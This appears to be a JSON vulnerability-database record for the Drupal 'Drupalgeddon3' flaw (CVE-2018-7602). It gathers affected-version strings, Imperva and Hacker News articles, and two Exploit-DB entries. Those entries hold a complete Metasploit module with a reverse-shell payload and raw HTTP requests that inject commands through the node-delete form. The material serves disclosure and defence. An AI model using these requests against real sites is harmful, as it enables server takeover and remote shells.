"cpe:2.3:a:drupal:drupal:6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.13:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.21:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.9:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha7:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.15:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.8:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.8:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.9:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.11:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.6:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.0:alpha4:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.22:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.16:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:5.23:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.12:*:*:*:*:*:*:*", 
"cpe:2.3:a:drupal:drupal:6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:7.12:*:*:*:*:*:*:*", "cpe:2.3:a:drupal:drupal:6.0:beta4:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T08:14:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-30T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["2018-7602", "CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "EDB-ID:44557", "href": "https://www.exploit-db.com/exploits/44557", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupalgeddon3',\r\n 'Description' => %q{\r\n CVE-2018-7602 / SA-CORE-2018-004\r\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 
8.x.\r\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\r\n Which could result in the site being compromised.\r\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\r\n\r\n The module can load msf PHP arch payloads, using the php/base64 encoder.\r\n\r\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SixP4ck3r', # Research and port to MSF\r\n 'Blaklis' # Initial PoC\r\n ],\r\n 'References' =>\r\n [\r\n ['SA-CORE', '2018-004'],\r\n ['CVE', '2018-7602'],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'encoder' => 'php/base64',\r\n 'payload' => 'php/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => [ARCH_PHP],\r\n 'Targets' =>\r\n [\r\n ['User register form with exec', {}],\r\n ],\r\n 'DisclosureDate' => 'Apr 29 2018',\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\r\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\r\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\r\n ])\r\n \r\n register_advanced_options(\r\n [\r\n\r\n ])\r\n end\r\n \r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def start_exploit\r\n drupal_node = datastore['DRUPAL_NODE']\r\n res = send_request_cgi({\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'method' => 'GET',\r\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\r\n })\r\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form -> #{form_token}\\n\"\r\n r2 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => 
\"#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'\",\r\n 'vars_post' => {\r\n 'form_id' => 'node_delete_confirm',\r\n '_triggering_element_name' => 'form_id',\r\n 'form_token'=> \"#{form_token}\"\r\n }\r\n })\r\n form_build_id = r2.body.scan( /form_build_id\" value=\"([^>]*)\" \\/>/).last.first\r\n print \"[*] Token Form_build_id -> #{form_build_id}\\n\"\r\n r3 = send_request_cgi({\r\n 'method' => 'POST',\r\n 'cookie' => datastore['DRUPAL_SESSION'],\r\n 'uri' => \"#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}\",\r\n 'vars_post' => {\r\n 'form_build_id' => \"#{form_build_id}\"\r\n }\r\n })\r\n end\r\n \r\n def exploit\r\n case datastore['TARGET']\r\n when 0\r\n start_exploit\r\n else\r\n fail_with(Failure::BadConfig, \"Your target is invalid.\")\r\n end\r\n end\r\n end", "sourceHref": "https://www.exploit-db.com/download/44557", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T08:14:38", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "exploitdb", "title": "Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 
7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["2018-7602", "CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "EDB-ID:44542", "href": "https://www.exploit-db.com/exploits/44542", "sourceData": "This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.\r\n\r\nYou must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).\r\n\r\nPOST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1\r\n[...]\r\nform_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]\r\n\r\nRetrieve the form_build_id from the response, and then triggering the exploit with : \r\n\r\nPOST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1\r\n[...]\r\nform_build_id=[FORM_BUILD_ID]\r\n\r\nThis will display the result of the whoami command.\r\n\r\nPatch your systems!\r\nBlaklis", "sourceHref": "https://www.exploit-db.com/download/44542", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2019-01-27T14:50:26", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. 
Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. 
We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. 
Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress ](<https://wordpress.org/plugins/>)_official site, the current number of plugins is 55,271. 
This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_[ ](<https://en.wikipedia.org/wiki/WordPress>)(see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. 
There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>) _popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) _('23-mar' bar in Figure 10 below), and _[CVE-2018-7602 ](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_('25-apr' bar below, also known as _[Drupalgeddon2 ](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. 
In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs ](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). 
A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-09T14:00:26", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": 
"2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2022-05-09T12:40:35", "description": "[](<https://thehackernews.com/images/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s728-e100/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it's the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. 
\n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://thehackernews.com/images/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s728-e100/drupal.png>)\n\n \nSince the previously disclosed flaw drew much attention and motivated attackers to target websites running Drupal, the company has urged all website administrators to install new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you need first to update your site to the 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied patches for the Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a Drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, which can be named **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging the Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within a few hours after its details went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. 
\n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T16:41:00", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T11:04:51", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:34", "description": "[](<https://thehackernews.com/images/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s728-e100/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. 
\n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete take over of affected websites. \n \nAlthough Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) derived much attention, which eventually allowed attackers actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer it **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://thehackernews.com/images/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s728-e100/drupal-exploit-code.png>)\n\n \nThe exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. 
\n \nDrupalgeddon3 exists due to improper input validation in Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass through the stripDangerousValues() function that filters the \"#\" character and can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the URL-encoded form of \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. 
\n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T12:32:00", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T12:32:45", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-06-05T16:04:05", "description": "Drupal is one of the most popular Content Management Systems (CMS), along with WordPress and Joomla. 
